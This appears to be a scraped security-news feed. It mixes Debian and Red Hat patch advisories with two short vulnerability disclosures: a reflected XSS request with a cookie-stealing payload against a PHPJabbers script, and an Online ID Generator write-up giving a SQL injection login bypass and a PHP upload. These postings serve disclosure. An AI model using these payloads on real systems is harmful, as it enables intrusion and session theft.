Debian Linux Security Advisory 5485-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5485-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 30, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-4573 CVE-2023-4574 CVE-2023-4575 CVE-2023-4581   
                 CVE-2023-4584

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 102.15.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 102.15.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTvgbMACgkQEMKTtsN8  
TjYyYQ/5AXRB+aU6RXtKeVkBOmIZpPzJPaSpdRNJ1YUK+V4yn9Pfsyowi+KWcGGw  
pp84zjhSlkc3ewNWvcMhyKyEB7wWRhnDE/VyxmdpxsS4CydkZc8RecLxU8B9Kddy  
qkvuXoYlFjE9fitqgU2eT0plrkJTImH6dbr6klmDqK+yQu3wl/penpMxxJEJgOWo  
oKiLe5asJJrtjVcUMrHs9CO2YspXcvlj4IBIqEfwz8FrVX0R+uMZrFARPbC6nHkv  
HJ/CUXSv3dIGEjl6opFjGDNKkBpO2ZwB9K3HBxmD320jLUgkRwKCCvyr1g+ZfcBt  
WwEwy/dE3fNJkLU5VlDdzY8O5CG4+OeP4QdICaSVqoVE1PfRX+trriAsWjENLm6o  
aWu1FLqMLvPiyRGz1d3QNeSMOvYG3czycGH5nEMWztBDFDJ+xWBZ57xUcT5xTIZb  
zWz+1ZL1rYaIrNPGC1nFcX5uHnnf7rzNjl0H18+FEudUwhzKUDdLxoMWqXJVtju2  
+YlY2OqKRQH8hrhVVuxv+L3oYF+jjQB/4hL1BrjB13K1Bqffeq5zSyKes7UfZ1AZ  
cSUVUsr3RKpCO7J+5lPOZqrThSBG3DWmmCBdl1AkZW4mv/g19EssM6zANYmZHzn8  
MyyqcIGdT0srUNECfrXzSFQ7ZhpTKAvCYt2wzrQhOsb7hxP4sa8=  
=s7Qw  
-----END PGP SIGNATURE-----

Debian Security Advisory 5485-1

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

PHP JABBERS PHP Review Script 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-4731-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.10.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.10 security update  
Advisory ID:       RHSA-2023:4731-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4731  
Issue date:        2023-08-30  
CVE Names:         CVE-2022-27664 CVE-2022-41723 CVE-2023-3899   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.10 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.13.10. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:4734

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:28173b4b6efe4f67f8753566e5f3c9831e454609b7f1888e4b6687907f4b7f24

(For s390x architecture)  
The image digest is  
sha256:28173b4b6efe4f67f8753566e5f3c9831e454609b7f1888e4b6687907f4b7f24

(For ppc64le architecture)  
The image digest is  
sha256:a52cb6235e043468cef505e4ce554743fb562d0d3240baf06c65e13c44201168

(For aarch64 architecture)  
The image digest is  
sha256:4aab4b205723d83e1ac383ee312ba95405523b7a9791174cd003dd6ac4e10628

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-13075 - ice-gnss process used by PTP GM config is taking more than half CPU, sometimes almost a full CPU  
OCPBUGS-15897 - leap-seconds.list file included as part of linuxptp-daemon container expired on June 28, 2023  
OCPBUGS-16013 - Failed to install cluster with IPI baremetal with fips enable  
OCPBUGS-16640 - Images: update azure cli to 2.40.0+ in upi-installer to avoid security vulnerability  
OCPBUGS-16772 - [4.13] ensure fixes land for large inodes  
OCPBUGS-16777 - [4.13] Bootimage bump tracker  
OCPBUGS-16804 - [4.13] silence irrelevant "failed to lock file fileutil: file already locked" warnings  
OCPBUGS-17158 - [4.13] update packages in ironic containers  
OCPBUGS-17187 - Bump to kubernetes 1.26.7  
OCPBUGS-17365 - BMH is not reconciled on Secret change  
OCPBUGS-17453 - Not able to mirror OCI base image for example kubeturbo-certified's image   
OCPBUGS-17557 - [4.13] Improve error handling when provided with a faulty PerformanceProfile at install time  
OCPBUGS-17559 - [4.13] Missing Azure File CSI NFS support  
OCPBUGS-17728 - clusteroperator/network is degraded because DaemonSet /openshift-multus/dhcp-daemon rollout is not making progress - pod dhcp-daemon-* is in CrashLoopBackOff State  
OCPBUGS-17733 - Backported credential request breaks some upgrades to 4.13.9  
OCPBUGS-17769 - Agent-based install process the container machine-config-controller will be oom  
OCPBUGS-17791 - opm serve is inefficient in memory use  
OCPBUGS-17837 - [4.13] PROVISIONING_MACS unbound variable in ironic config  
OCPBUGS-17910 - [4.13] CI fails on "events should not repeat pathologically" because of missing node annotations

6. References:

https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7+PuAAoJENzjgjWX9erEzwoP/0uIAS7ua3U7t1p6V3hg9Qkb  
B2VmfDTdE1X4T3nA1xkjocg8wI/GlH65ai46PpADoeqFH8DbLK1dUimfvXoERxJM  
lDfqQ2ARPOQBV7zhp757fmSThLpVCP/poaUswEZh3WC+PwMik2VT/f9/8QnI4tXU  
IqE7+RJByGPI5lNJbMRLKEXVUGhZdUSjZexflZYTeuLgffYJdMvnKa2PwaywDSqV  
m2vLl9c1GkokenvGryxJNQ2fqfEnVMUVTUzNsjzSfuVXGyGRrrKA/TchwQKHRwgB  
ICE4wIxBP2Wm+WIp52LG7AKHXmbuG5KwgBA3Vu343xpP/qa0BeEJqrN6MsKZY805  
DFzbyJS0nbE/ZE65KtrY2wKzD2dkY8ox6ed0k9q//fCx8ycXOjSIN9uzI1qq838c  
kjQZe3aIz18Gxf/QOoOWRyzgxZLiGbfcZ02ZcTodgPJ/5iJjakFMVJUBmDiCMs6D  
wRhW+LNm7nOXdCQE5Nj3s7+f4C47XLAYs3vDAdgSAltBASaRluusTQFXsbU3vh2E  
MoSI3t2NkE4fb7afy/dSpznO6HG+k4XlEXojACJooKVtskzey+mNOq4arTxasKw8  
XtkCWYPMxSA07DW5iNzeKxg8XokPuX4pRpwd9/Z3YX+JKhfMZaTitnbEI0ItCd/P  
sxxyWgcwD/Yh5NKNjQxQ  
=K0GL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4731-01

Red Hat Security Advisory 2023-4730-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.10.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.10 security update  
Advisory ID:       RHSA-2023:4730-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4730  
Issue date:        2023-08-30  
CVE Names:         CVE-2021-20329 CVE-2023-3899   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.13.10 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.13.10. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:4731

Security Fix(es):

* mongo-go-driver: specific cstrings input may not be properly validated  
(CVE-2021-20329)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

4. Bugs fixed (https://bugzilla.redhat.com/):

1971033 - CVE-2021-20329 mongo-go-driver: specific cstrings input may not be properly validated

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-14954 - bf2-switch-mode.sh fails if multiple devices are detected  
OCPBUGS-15830 - LocalStorageOperator does not create PersistentVolumes  
OCPBUGS-17425 - Internal error occurred: add operation does not apply: doc is missing path: "/spec/containers/0/volumeMounts/-": missing value  
OCPBUGS-17525 - Prefer wwn- and scsi- prefixed device-ids in LSO

6. References:

https://access.redhat.com/security/cve/CVE-2021-20329  
https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7+LZAAoJENzjgjWX9erEmxwP/jF5zvEuudLfW23JXDMe9Oa5  
P3yGm2rTVr7HCs122rIyId5eleo76/FftdUAsy8BkUX2lLvktB61jXFXsVa++wrV  
YeWt9tXb9Lh2M8eB6EaqsRbTqs71cWxJ15YGXF4HfiYSbT2ugaoJIMPsuuFZYxsB  
9Qdrulr/fU1/mVhsnQKDcNOouiDzbvPT6rGtecgK+qiJ5yc6VpSDw061xma0GDp1  
wbv70OLv0Tt3yyPl+8+7Re9PWgNf6/0jaP3ebdc+fV6DWxfVgtJS1ude6n7Lumt4  
Baz0J8u1bdEb5MLFgS8hXp8g0mAhPrTF36/Hk14rEgNT/3pkAe0N3VnGbyAc/wj8  
t6CpilttcdF8NpdAM8ON4gLnUM9naoCwzdYmR7FDvyghbZmeXLLBiUy0B2pHes6g  
r4iLOK/9R5+8s4OIpT7aPMLXdGe0dKmlcQSB4xQIdBgTdsum/Li34Y6VT/gCWddv  
OjRUhBl3CkFtKutPmaBWtbCBmhWrYdQ1702QqhVxk+L6FKjFbOew48RaV+ZacExr  
kBMoXcWchOXfUxqljvuuAlXUdysvxKiXjMf4WjkZ0BaHhTsb3OZUXEreUTnGGYvK  
9659sjfkqLCGsn59ZYosv2O5mj8Dclxf6mYlcvzfTjnV5+QDi9F6IrWKIEP6hz+b  
eyPdiQLDi4sj27N+AtZs  
=3QJE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4730-01

Online ID Generator version 1.0 suffers from remote SQL injection that allows for login bypass and remote shell upload vulnerabilities.

    ## Title: Online-ID-Generator-1.0-SQLi-Bypass-login-ShellUpload-RCE## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip## Reference: https://portswigger.net/web-security/sql-injection## Reference: https://portswigger.net/web-security/file-upload## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload## Description:hat-trick: The system of this pseudo developer is vulnerable to SQLi,Shell Upload, and RCE at the same time.This system must be terminated. To all users who like and follow thisperson: Please STOPT DOING THIS!THIS WILL BE YOUR RESPONSIBLE WHEN YOU LOSE MONEY OR WHATEVERIMPORTANT FOR YOU! BR @nu11secur1tySTATUS: HIGH-CRITICAL Vulnerability[+]Bypass login SQLi:# In login form, for user:```mysqlnu11secur1ty' or 1=1#```[+]Shell Upload exploit:## For system logo:```php<?php  phpinfo();?>```[+]RCE Exploit## Execution from the remote browser:```URLhttp://localhost/id_generator/uploads/1693471560_info.php```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)## Time spend:00:10:00

Online ID Generator 1.0 SQL Injection / Shell Upload

Red Hat Security Advisory 2023-4888-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include out of bounds write and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:4888-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4888  
Issue date:        2023-08-30  
CVE Names:         CVE-2022-42896 CVE-2023-1829 CVE-2023-3390   
                   CVE-2023-35788   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

* kernel: Use-after-free vulnerability in the Linux Kernel traffic control  
index filter (CVE-2023-1829)

* kernel: UAF in nftables when nft_set_lookup_global triggered after  
handling named and anonymous sets in batch requests (CVE-2023-3390)

* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
(CVE-2023-35788)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c  
2188470 - CVE-2023-1829 kernel: Use-after-free vulnerability in the Linux Kernel traffic control index filter  
2213260 - CVE-2023-3390 kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests  
2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kpatch-patch-4_18_0-372_41_1-1-7.el8_6.src.rpm  
kpatch-patch-4_18_0-372_46_1-1-5.el8_6.src.rpm  
kpatch-patch-4_18_0-372_51_1-1-4.el8_6.src.rpm  
kpatch-patch-4_18_0-372_52_1-1-3.el8_6.src.rpm  
kpatch-patch-4_18_0-372_57_1-1-2.el8_6.src.rpm  
kpatch-patch-4_18_0-372_64_1-1-1.el8_6.src.rpm

ppc64le:  
kpatch-patch-4_18_0-372_41_1-1-7.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-7.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-7.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_51_1-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_51_1-debuginfo-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_51_1-debugsource-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_52_1-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_52_1-debuginfo-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_52_1-debugsource-1-3.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_57_1-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_57_1-debuginfo-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_57_1-debugsource-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_64_1-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_64_1-debuginfo-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_64_1-debugsource-1-1.el8_6.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-372_41_1-1-7.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-7.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-7.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_51_1-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_51_1-debuginfo-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_51_1-debugsource-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_52_1-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_52_1-debuginfo-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_52_1-debugsource-1-3.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_57_1-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_57_1-debuginfo-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_57_1-debugsource-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_64_1-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_64_1-debuginfo-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_64_1-debugsource-1-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/cve/CVE-2023-1829  
https://access.redhat.com/security/cve/CVE-2023-3390  
https://access.redhat.com/security/cve/CVE-2023-35788  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7+K8AAoJENzjgjWX9erEJvYP/iLAmG8SlAVzb2RCSQ+IV/ZY  
iN/IjtZk2w6jAyYqfDDcjVhH3pFSg7EZtXm1+eZf/V0Tghh89zDerhybWFHczipm  
83FwEbtNqCzF2ywVAR2qQiU6ZdlIvySiIv8trPzkzmIyfQiB1R7agYWfuxOCysI8  
BxJd01PlI5/3vvj7EMyL0Q7XxS/CifMj/r+/aNmdxqM44ALvYMafN+rcB/J/xfAf  
sL/m1VQJEHFEEHEXmMWyS6dnK4uiAJ+6oHIg2z4vMFUFDYwBFuK+IH2+4vYBr+6l  
wqsWGlE8EyxfUCQqO/8XgeUrcbWkcz8IGLK2moiLNgMTp22YApet/BQub8smdrFU  
+KwHiCBOzgPuSm+3Ufhv+0N/AHg/Ib7D75ETmQCqTHdUWOcbV9gC5NCOG9ZTHuC6  
6Pb+Jo4EDGbHO5dFWZfrpDX9KctQR5Ot3qm2Q6Fu1CTE/BNTi461C9gPYpsj05TF  
0bZvWV5VLrLJZcwtjfTRPqsJ/ZIS55hcrJjz1FAYKBuMDX/6msVmDWQ7W9y84DDH  
Zpw6cbLxNkzhH5cQWfs+rd+nj5FJf0FJU8eKZCIs0yJX21/+ok4+kqol3BZaJhjq  
Kbk5aC6He1VZHATIZa+I0fwianIFsR9M6VRGgPw9LnzlQ6Rg5obwuan8dsSov5qE  
3ZU/5QqCvAk4FP6uoYCB  
=VsxP  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4888-01

Red Hat Security Advisory 2023-4877-01 - IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 8 to version 8 SR8-FP10.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-ibm security update  
Advisory ID:       RHSA-2023:4877-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4877  
Issue date:        2023-08-30  
CVE Names:         CVE-2023-22049   
=====================================================================

1. Summary:

An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Supplementary (v. 8) - ppc64le, s390x, x86_64

3. Description:

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM  
Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR8-FP10.

Security Fix(es):

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of IBM Java must be restarted for this update to take  
effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)

6. Package List:

Red Hat Enterprise Linux Supplementary (v. 8):

ppc64le:  
java-1.8.0-ibm-1.8.0.8.10-1.el8_8.ppc64le.rpm  
java-1.8.0-ibm-demo-1.8.0.8.10-1.el8_8.ppc64le.rpm  
java-1.8.0-ibm-devel-1.8.0.8.10-1.el8_8.ppc64le.rpm  
java-1.8.0-ibm-headless-1.8.0.8.10-1.el8_8.ppc64le.rpm  
java-1.8.0-ibm-jdbc-1.8.0.8.10-1.el8_8.ppc64le.rpm  
java-1.8.0-ibm-plugin-1.8.0.8.10-1.el8_8.ppc64le.rpm  
java-1.8.0-ibm-src-1.8.0.8.10-1.el8_8.ppc64le.rpm  
java-1.8.0-ibm-webstart-1.8.0.8.10-1.el8_8.ppc64le.rpm

s390x:  
java-1.8.0-ibm-1.8.0.8.10-1.el8_8.s390x.rpm  
java-1.8.0-ibm-demo-1.8.0.8.10-1.el8_8.s390x.rpm  
java-1.8.0-ibm-devel-1.8.0.8.10-1.el8_8.s390x.rpm  
java-1.8.0-ibm-headless-1.8.0.8.10-1.el8_8.s390x.rpm  
java-1.8.0-ibm-jdbc-1.8.0.8.10-1.el8_8.s390x.rpm  
java-1.8.0-ibm-src-1.8.0.8.10-1.el8_8.s390x.rpm

x86_64:  
java-1.8.0-ibm-1.8.0.8.10-1.el8_8.x86_64.rpm  
java-1.8.0-ibm-demo-1.8.0.8.10-1.el8_8.x86_64.rpm  
java-1.8.0-ibm-devel-1.8.0.8.10-1.el8_8.x86_64.rpm  
java-1.8.0-ibm-headless-1.8.0.8.10-1.el8_8.x86_64.rpm  
java-1.8.0-ibm-jdbc-1.8.0.8.10-1.el8_8.x86_64.rpm  
java-1.8.0-ibm-plugin-1.8.0.8.10-1.el8_8.x86_64.rpm  
java-1.8.0-ibm-src-1.8.0.8.10-1.el8_8.x86_64.rpm  
java-1.8.0-ibm-webstart-1.8.0.8.10-1.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

